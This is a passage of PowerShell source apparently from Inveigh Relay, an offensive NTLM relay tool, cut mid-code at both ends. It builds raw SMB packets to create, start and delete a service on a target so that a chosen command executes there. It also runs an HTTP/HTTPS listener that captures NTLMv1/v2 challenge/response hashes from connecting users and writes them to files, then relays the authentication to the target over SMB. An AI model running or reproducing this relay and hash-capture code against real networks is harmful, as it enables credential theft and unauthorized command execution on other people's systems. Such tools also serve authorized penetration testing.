0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + - $SMB_service_bytes + - 0x00,0x00 + - $SMB_referent_ID_bytes + - 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + - $SMB_service_bytes + - 0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00 + - $SMB_relay_command_length_bytes + - 0x00,0x00,0x00,0x00 + - $SMB_relay_command_length_bytes + - $SMB_relay_command_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00 - - $SMB_multiplex_id = 0x09 - } - - 7 - { - $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest - } - - - 8 - { - $SMB_relay_execute_send = 0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00, - 0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00, - 0x00,0x00,0x00,0x13,0x00 + - $SMB_context_handler + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - } - - 9 - { - $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest - } - - 10 - { - $SMB_relay_execute_send = 0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, - 0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00, - 0x00,0x00,0x00,0x02,0x00 + - $SMB_context_handler - } - - 11 - { - $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest - } - - } - - $SMB_relay_execute_stream.Write($SMB_relay_execute_send,0,$SMB_relay_execute_send.Length) - $SMB_relay_execute_stream.Flush() - - if($SMBRelayNetworkTimeout) - { - $SMB_relay_execute_timeout = New-Timespan -Seconds $SMBRelayNetworkTimeout - $SMB_relay_execute_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() - - while(!$SMB_relay_execute_stream.DataAvailable) - { - - if($SMB_relay_execute_stopwatch.Elapsed -ge $SMB_relay_execute_timeout) - { - $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")]) - $SMB_relay_failed = $true - break SMB_relay_execute_loop - } - - } - - } - - if ($k -eq 5) - { - $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length) - $SMB_context_handler = $SMB_relay_execute_bytes[88..107] - - if([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_context_handler) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00') - { - $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")]) - } - elseif([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '05-00-00-00') - { - $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget")]) - $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget") - $SMB_relay_failed = $true - } - else - { - $SMB_relay_failed = $true - } - - } - elseif (($k -eq 7) -or ($k -eq 9) -or ($k -eq 11)) - { - $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length) - - switch($k) - { - - 7 - { - $SMB_context_handler = $SMB_relay_execute_bytes[92..111] - $SMB_relay_execute_error_message = "Service creation fault context mismatch" - } - - 11 - { - $SMB_relay_execute_error_message = "Service start fault context mismatch" - } - - 13 - { - $SMB_relay_execute_error_message = "Service deletion fault context mismatch" - } - - } - - if([System.BitConverter]::ToString($SMB_context_handler[0..3]) -ne '00-00-00-00') - { - $SMB_relay_failed = $true - } - - if([System.BitConverter]::ToString($SMB_relay_execute_bytes[88..91]) -eq '1a-00-00-1c') - { - $inveigh.console_queue.Add("$SMB_relay_execute_error_message service on $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $SMB_relay_execute_error on $SMBRelayTarget")]) - $SMB_relay_failed = $true - } - - } - else - { - $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length) - } - - if(!$SMB_relay_failed -and $k -eq 7) - { - $inveigh.console_queue.Add("SMB relay service $SMB_service created on $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $SMBRelayTarget")]) - } - elseif((!$SMB_relay_failed) -and ($k -eq 9)) - { - $inveigh.console_queue.Add("SMB relay command likely executed on $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command likely executed on $SMBRelayTarget")]) - - if($SMBRelayAutoDisable -eq 'Y') - { - $inveigh.SMB_relay = $false - $inveigh.console_queue.Add("SMB relay auto disabled due to success") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")]) - } - - } - elseif(!$SMB_relay_failed -and $k -eq 11) - { - $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $SMBRelayTarget")]) - } - - $SMB_relay_execute_ReadAndRequest = 0x00,0x00,0x00,0x37,0xff,0x53,0x4d,0x42,0x2e,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - $SMB_multiplex_ID + - 0x00,0x0a,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x58, - 0x02,0x58,0x02,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00 - - if($SMB_relay_failed) - { - $inveigh.console_queue.Add("SMB relay failed on $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $SMBRelayTarget")]) - BREAK SMB_relay_execute_loop - } - - $k++ - } - - $inveigh.SMB_relay_active_step = 0 - $SMB_relay_socket.Close() - } - -} - -# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener -$HTTP_scriptblock = -{ - param ($SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$WPADAuth) - - function NTLMChallengeBase64 - { - - $HTTP_timestamp = Get-Date - $HTTP_timestamp = $HTTP_timestamp.ToFileTime() - $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) - $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - - if($Inveigh.challenge) - { - $HTTP_challenge = $Inveigh.challenge - $HTTP_challenge_bytes = $Inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') - $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - } - else - { - $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) - $HTTP_challenge = $HTTP_challenge_bytes -replace ' ','' - $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - } - - $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null - - $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, - 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 + - $HTTP_challenge_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, - 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, - 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, - 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, - 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, - 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, - 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, - 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, - 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + - $HTTP_timestamp + - 0x00,0x00,0x00,0x00,0x0a,0x0a - - $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) - $NTLM = 'NTLM ' + $NTLM_challenge_base64 - $NTLM_challenge = $HTTP_challenge - - return $NTLM - - } - - while ($inveigh.relay_running) - { - $inveigh.context = $inveigh.HTTP_listener.GetContext() - $inveigh.request = $inveigh.context.Request - $inveigh.response = $inveigh.context.Response - $inveigh.message = '' - $NTLM = 'NTLM' - - if($inveigh.request.IsSecureConnection) - { - $HTTP_type = "HTTPS" - } - else - { - $HTTP_type = "HTTP" - } - - if ($inveigh.request.RawUrl -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') - { - $inveigh.response.StatusCode = 200 - } - else - { - $inveigh.response.StatusCode = 401 - } - - $HTTP_request_time = Get-Date -format 's' - - if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $inveigh.request.RemoteEndpoint.Address -eq $HTTP_request_remote_endpoint_old) - { - $HTTP_raw_url_output = $false - } - else - { - $HTTP_raw_url_output = $true - } - - if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output) - { - $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)]) - } - - $HTTP_request_raw_url_old = $inveigh.request.RawUrl - $HTTP_request_remote_endpoint_old = $inveigh.request.RemoteEndpoint.Address - $HTTP_request_time_old = $HTTP_request_time - - [String] $authentication_header = $inveigh.request.headers.getvalues('Authorization') - - if($authentication_header.startswith('NTLM ')) - { - $authentication_header = $authentication_header -replace 'NTLM ','' - [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) - $inveigh.response.StatusCode = 401 - - if ($HTTP_request_bytes[8] -eq 1) - { - - if($inveigh.SMB_relay -and $inveigh.SMB_relay_active_step -eq 0 -and $inveigh.request.RemoteEndpoint.Address -ne $SMBRelayTarget) - { - $inveigh.SMB_relay_active_step = 1 - $inveigh.console_queue.Add("$HTTP_type to SMB relay triggered by " + $inveigh.request.RemoteEndpoint.Address + " at $(Get-Date -format 's')") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by " + $inveigh.request.RemoteEndpoint.Address)]) - $inveigh.console_queue.Add("Grabbing challenge for relay from $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $SMBRelayTarget)]) - $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient - $SMB_relay_socket.Connect($SMBRelayTarget,"445") - - if(!$SMB_relay_socket.connected) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")]) - $inveigh.SMB_relay_active_step = 0 - } - - if($inveigh.SMB_relay_active_step -eq 1) - { - $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes - $inveigh.SMB_relay_active_step = 2 - $SMB_relay_bytes = $SMB_relay_bytes[2..$SMB_relay_bytes.Length] - $SMB_user_ID = $SMB_relay_bytes[34..33] - $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes) - $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-","" - $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000") - $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2 - $SMB_domain_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes - $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)] - $SMB_target_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes - $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)] - $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)] - $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)] - - $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 + - $SMB_domain_length_offset_bytes + - 0x05,0x82,0x89,0xa2 + - $SMB_relay_NTLM_challenge + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + - $SMB_target_length_offset_bytes + - $SMB_relay_target_details - - $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) - $NTLM = 'NTLM ' + $NTLM_challenge_base64 - $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes - $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $NTLM_challenge) - $inveigh.console_queue.Add("Received challenge $NTLM_challenge for relay from $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $SMBRelayTarget")]) - $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to " + $inveigh.request.RemoteEndpoint.Address) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to " + $inveigh.request.RemoteEndpoint.Address)]) - $inveigh.SMB_relay_active_step = 3 - } - else - { - $NTLM = NTLMChallengeBase64 - } - - } - else - { - $NTLM = NTLMChallengeBase64 - } - - $inveigh.response.StatusCode = 401 - } - elseif ($HTTP_request_bytes[8] -eq 3) - { - $NTLM = 'NTLM' - $HTTP_NTLM_offset = $HTTP_request_bytes[24] - $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes - $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes - $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes - [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*' - $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) - $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) - - if($HTTP_NTLM_domain_length -eq 0) - { - $HTTP_NTLM_domain_string = '' - } - else - { - $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes - } - - $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes - $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes - $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes - $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes - - if($HTTP_NTLM_length -eq 24) # NTLMv1 - { - $NTLM_type = "NTLMv1" - $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" - $NTLM_response = $NTLM_response.Insert(48,':') - $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge - - if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) - { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) - $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash) - $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash) - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) - - if($inveigh.file_output) - { - $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) - } - - } - - if($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat) - { - $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) - } - - } - else # NTLMv2 - { - $NTLM_type = "NTLMv2" - $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" - $NTLM_response = $NTLM_response.Insert(32,':') - $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response - - if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) - { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) - $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash) - $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash) - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) - - if($inveigh.file_output) - { - $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) - } - - } - - if ($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat) - { - $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address - } - - } - - $inveigh.response.StatusCode = 200 - $NTLM_challenge = '' - $HTTP_raw_url_output = $true - - if ($inveigh.SMB_relay -and $inveigh.SMB_relay_active_step -eq 3) - { - - if(!$SMBRelayUsernames -or $SMBRelayUsernames -contains $HTTP_NTLM_user_string -or $SMBRelayUsernames -contains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") - { - - if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))) - { - - if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget") - { - - if($NTLM_type -eq 'NTLMv2') - { - $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")]) - $SMB_relay_response_return_bytes = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_user_ID - $SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.Length] - - if(!$SMB_relay_failed -and [System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq '00-00-00-00') - { - $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")]) - $inveigh.SMB_relay_active_step = 4 - SMBRelayExecute $SMB_relay_socket $SMB_user_ID - } - else - { - $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")]) - $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget") - $inveigh.SMB_relay_active_step = 0 - $SMB_relay_socket.Close() - } - - } - else - { - $inveigh.console_queue.Add("NTLMv1 SMB relay not yet supported") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NTLMv1 relay not yet supported")]) - $inveigh.SMB_relay_active_step = 0 - $SMB_relay_socket.Close() - } - - } - else - { - $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")]) - $inveigh.SMB_relay_active_step = 0 - $SMB_relay_socket.Close() - } - - } - else - { - $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_user_string appears to be a machine account") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")]) - $inveigh.SMB_relay_active_step = 0 - $SMB_relay_socket.Close() - } - - } - else - { - $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on SMB relay username list") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")]) - $inveigh.SMB_relay_active_step = 0 - $SMB_relay_socket.Close() - } - - } - - } - else - { - $NTLM = 'NTLM' - } - - } - - [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message) - $inveigh.response.ContentLength64 = $HTTP_buffer.Length - $inveigh.response.AddHeader("WWW-Authenticate",$NTLM) - $HTTP_stream = $inveigh.response.OutputStream - $HTTP_stream.Write($HTTP_buffer,0,$HTTP_buffer.Length) - $HTTP_stream.close() - } - - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() -} - -$control_relay_scriptblock = -{ - param ($RunTime) - - if($RunTime) - { - $control_timeout = New-Timespan -Minutes $RunTime - $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() - } - - while ($inveigh.relay_running) - { - - if($RunTime) - { - - if($control_stopwatch.Elapsed -ge $control_timeout) - { - - if($inveigh.HTTP_listener.IsListening) - { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() - } - - $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")]) - Start-Sleep -m 5 - $inveigh.relay_running = $false - - if($inveigh.HTTPS) - { - & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null - - try - { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$false)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() - } - catch - { - - if($inveigh.status_output) - { - $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually") - } - - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append - } - - } - - } - - $inveigh.HTTP = $false - $inveigh.HTTPS = $false - } - - } - - if($inveigh.file_output -and (!$inveigh.running -or !$inveigh.bruteforce_running)) - { - - while($inveigh.log_file_queue.Count -gt 0) - { - $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append - $inveigh.log_file_queue.RemoveRange(0,1) - } - - while($inveigh.NTLMv1_file_queue.Count -gt 0) - { - $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append - $inveigh.NTLMv1_file_queue.RemoveRange(0,1) - } - - while($inveigh.NTLMv2_file_queue.Count -gt 0) - { - $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append - $inveigh.NTLMv2_file_queue.RemoveRange(0,1) - } - - while($inveigh.cleartext_file_queue.Count -gt 0) - { - $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append - $inveigh.cleartext_file_queue.RemoveRange(0,1) - } - - } - - Start-Sleep -m 5 - } - - } - -# HTTP/HTTPS Listener Startup function -function HTTPListener() -{ - $inveigh.HTTP_listener = New-Object System.Net.HttpListener - - if($inveigh.HTTP) - { - $inveigh.HTTP_listener.Prefixes.Add('http://*:80/') - } - - if($inveigh.HTTPS) - { 